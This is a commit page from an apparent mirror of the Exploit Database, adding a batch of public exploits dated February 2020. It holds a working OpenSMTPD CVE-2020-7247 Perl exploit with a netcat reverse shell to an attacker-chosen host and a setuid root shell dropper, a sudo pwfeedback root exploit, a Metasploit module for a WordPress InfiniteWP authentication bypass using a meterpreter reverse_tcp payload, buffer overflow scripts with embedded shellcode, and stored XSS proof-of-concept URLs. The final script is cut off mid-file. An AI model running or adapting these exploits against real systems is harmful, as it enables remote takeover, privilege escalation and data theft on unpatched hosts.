bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-12

Browse source 
18 changes to exploits/shellcodes

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)

Sudo 1.8.25p - Buffer Overflow
Torrent iPod Video Converter 1.51 - Stack Overflow
DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution
Microsoft SharePoint - Deserialization Remote Code Execution
CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
WordPress InfiniteWP - Client Authentication Bypass (Metasploit)
This commit is contained in:
Offensive Security 2020-02-12 05:01:58 +00:00
parent 8cbf7883c1
commit ea7a01d8fb
17 changed files with 972 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
exploits/cgi/webapps/48040.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839
# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.
# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!

155
exploits/freebsd/remote/48051.pl Executable file
View file

@ -0,0 +1,155 @@
# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
# Date: 2020-02-02
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.opensmtpd.org/
# Version: OpenSMTPD 6.4.0 - 6.6.1
# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
# CVE: CVE-2020-7247
#!/usr/bin/perl
#
# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
# Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
# other products, allows remote attackers to execute arbitrary commands as root
# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
# FROM field. This affects the "uncommented" default configuration. The issue
# exists because of an incorrect return value upon failure of input validation
# (CVE-2020-7247).
#
# "Wow. I feel all butterflies in my tummy that bugs like this still exist.
# That's awesome :)" -- skyper
#
# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
# root on OpenBSD in the default configuration, or execute remote commands as
# root (only in OpenSMTPD "uncommented" default configuration).
#
# See also:
# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
# https://www.kb.cert.org/vuls/id/390745/
# https://www.opensmtpd.org/security.html
#
# Usage (LPE):
# phish$ uname -a
# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
# phish$ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
# phish$ ./raptor_opensmtpd.pl LPE
# [...]
# Payload sent, please wait 5 seconds...
# -rwsrwxrwx 1 root wheel 12432 Feb 1 21:20 /usr/local/bin/pwned
# phish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Usage (RCE):
# raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
# [...]
# Payload sent, please wait 5 seconds...
# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
# /bin/sh: Can't find tty file descriptor
# /bin/sh: warning: won't have full job control
# phish# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
#
# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
# OpenBSD 6.6 [tested]
# OpenBSD 6.5 [untested]
# OpenBSD 6.4 [untested]
# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
# Other Linux distributions [untested]
# FreeBSD [untested]
# NetBSD [untested]
#
use IO::Socket::INET;
print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";
$usage = "Usage:\n".
"$0 LPE\n".
"$0 RCE <remote_host> <local_host> [<domain>]\n";
$lport = 4444;
($type, $rhost, $lhost, $domain) = @ARGV;
die $usage if (($type ne "LPE") && ($type ne "RCE"));
# Prepare the payload
if ($type eq "LPE") { # LPE
$payload = "cp /bin/sh /usr/local/bin/pwned\n".
"echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n".
"gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
$rhost = "127.0.0.1";
} else { # RCE
die $usage if ((not defined $rhost) || (not defined $lhost));
$payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|".
"nc $lhost $lport >/tmp/f";
}
# Open SMTP connection
$| = 1;
$s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n";
# Read SMTP banner
$r = <$s>;
print "< $r";
die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);
# Send HELO
$w = "HELO fnord";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);
# Send evil MAIL FROM
$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);
# Send RCPT TO
if (not defined $domain) {
$rcpt = "<root>";
} else {
$rcpt = "<root\@$domain>";
}
$w = "RCPT TO:$rcpt";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);
# Send payload in DATA
$w = "DATA";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
#print "> $w\n"; # uncomment for debugging
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);
# Close SMTP connection
$s->close();
print "\nPayload sent, please wait 5 seconds...\n";
# Got root?
if ($type eq "LPE") { # LPE
sleep 5;
print `ls -l /usr/local/bin/pwned`;
exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
} else { # RCE
exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
#exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
}

0
exploits/linux/local/47995.txt → exploits/linux/dos/47995.txt
View file

52
exploits/linux/local/48052.sh Executable file
View file

@ -0,0 +1,52 @@
#!/bin/bash
# We will need socat to run this.
if [ ! -f socat ];
then
wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
chmod +x socat
fi
cat <<EOF > xpl.pl
\$buf_sz = 256;
\$askpass_sz = 32;
\$signo_sz = 4*65;
\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
print("\x00\x15"x(\$buf_sz+\$askpass_sz) .
("\x00\x15"x\$signo_sz) .
(\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x15"x104 . "\n");
EOF
cat <<EOF > exec.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
printf("Exploiting!\n");
int fd = open("/proc/self/exe", O_RDONLY);
struct stat st;
fstat(fd, &st);
if (st.st_uid != 0)
{
fchown(fd, 0, st.st_gid);
fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
}
else
{
setuid(0);
execve("/bin/bash",NULL,NULL);
}
return 0;
}
EOF
cc -w exec.c -o /tmp/pipe
./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
sleep 0.5
export SUDO_ASKPASS=/tmp/pipe
sudo -k -S id < /tmp/pty
/tmp/pipe

16
exploits/php/webapps/48042.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-02-10
# Exploit Author: Sayak Naskar
# Vendor Homepage: https://vanillaforums.com/en/
# Version: 2.6.3
# Tested on: Windows, Linux
# CVE : CVE-2020-8825
A Stored xss was found in Vanillaforum 2.6.3 .
index.php?p=/dashboard/settings/branding
# Proof of Concept:
An attacker will insert a payload on branding section. So, whenever an user will open the branding section then attacker automatically get all sensitive information of the user.

177
exploits/php/webapps/48047.rb Executable file
View file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress InfiniteWP Client Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass in the WordPress
InfiniteWP Client plugin to log in as an administrator and execute
arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
The module will attempt to retrieve the original PLUGIN_FILE contents
and restore them after payload execution. If VerifyContents is set,
which is the default setting, the module will check to see if the
restored contents match the original.
Note that a valid administrator username is required for this module.
WordPress >= 4.9 is currently not supported due to a breaking WordPress
API change. Tested against 4.8.3.
},
'Author' => [
'WebARX', # Discovery
'wvu' # Module
],
'References' => [
['WPVDB', '10011'],
['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
],
'DisclosureDate' => '2020-01-14',
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false,
'Targets' => [['InfiniteWP Client < 1.9.4.5', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
))
register_options([
OptString.new('USERNAME', [true, 'WordPress username', 'admin']),
OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
])
register_advanced_options([
OptBool.new('VerifyContents', [false, 'Verify file contents', true])
])
end
def username
datastore['USERNAME']
end
def plugin_file
datastore['PLUGIN_FILE']
end
def plugin_uri
normalize_uri(wordpress_url_plugins, plugin_file)
end
def check
unless wordpress_and_online?
return CheckCode::Unknown('Is the site online and running WordPress?')
end
unless (version = wordpress_version)
return CheckCode::Unknown('Could not detect WordPress version')
end
if Gem::Version.new(version) >= Gem::Version.new('4.9')
return CheckCode::Safe("WordPress #{version} is an unsupported target")
end
vprint_good("WordPress #{version} is a supported target")
check_version_from_custom_file(
normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
/^= ([\d.]+)/,
'1.9.4.5'
)
end
# https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
def auth_bypass
json = {
'iwp_action' => %w[add_site readd_site].sample,
'params' => {'username' => username}
}.to_json
res = send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_backend,
'data' => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
)
unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
end
print_good("Successfully obtained cookie for #{username}")
vprint_status("Cookie: #{cookie}")
cookie
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Bypassing auth for #{username} at #{full_uri}")
unless (@cookie = auth_bypass).include?('wordpress_logged_in')
fail_with(Failure::NoAccess, "Could not log in as #{username}")
end
print_good("Successfully logged in as #{username}")
write_and_exec_payload
end
def write_and_exec_payload
print_status("Retrieving original contents of #{plugin_uri}")
contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
unless contents
fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
end
print_good("Successfully retrieved original contents of #{plugin_uri}")
vprint_status('Contents:')
print(contents)
print_status("Overwriting #{plugin_uri} with payload")
unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
end
print_good("Successfully overwrote #{plugin_uri} with payload")
print_status("Requesting payload at #{plugin_uri}")
send_request_cgi({
'method' => 'GET',
'uri' => plugin_uri
}, 0)
restore_contents(contents)
end
def restore_contents(og_contents)
print_status("Restoring original contents of #{plugin_uri}")
unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
end
return unless datastore['VerifyContents']
contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
unless contents == og_contents
fail_with(Failure::UnexpectedReply,
"Current contents of #{plugin_uri} DO NOT match original!")
end
print_good("Current contents of #{plugin_uri} match original!")
end
end

87
exploits/windows/local/48039.py Executable file
View file

@ -0,0 +1,87 @@
# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent iPod Video Converter
# 2) run python script & open created 'poc.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash
# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
# 89E7 mov di,sp
# DADC fcmovu st4
# D977F4 fnstenv [bx-0xc]
# 5D pop bp
# 55 push bp
# 59 pop cx
# 49 dec cx
shellcode = b'\x54\x5f' # push esp # pop edi
shellcode += b'\x56\x59' # push esi # pop ecx
shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"
EIP_OS = '\x41'*(4136-len(shellcode))
EIP = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)
payload = shellcode + EIP_OS + EIP
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

53
exploits/windows/local/48041.py Executable file
View file

@ -0,0 +1,53 @@
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "key.txt".
#2. Just copy the text inside "key.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10014283)
#0x10014283 : pop ebx # pop ecx # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode
try:
f=open("key.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

24
exploits/windows/local/48043.txt Normal file
View file

@ -0,0 +1,24 @@
Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto
C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: freeFTPdService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : freeFTPdService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem

24
exploits/windows/local/48044.txt Normal file
View file

@ -0,0 +1,24 @@
Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeSSHd.exe
Version: 1.3.1
Tested On: Windows 10 (32-bit)
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
FreeSSHDService C:\Program Files\freeSSHd\FreeSSHDService.exe Auto
C:\Users\nightelf>sc qc FreeSSHDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FreeSSHDService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\freeSSHd\FreeSSHDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FreeSSHDService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem

24
exploits/windows/local/48045.txt Normal file
View file

@ -0,0 +1,24 @@
Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)
C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto
C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Sync Breeze Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Sync Breeze Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

54
exploits/windows/local/48046.py Executable file
View file

@ -0,0 +1,54 @@
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
long_buffer = "\x44" * 600
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode + long_buffer
try:
f=open("name.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
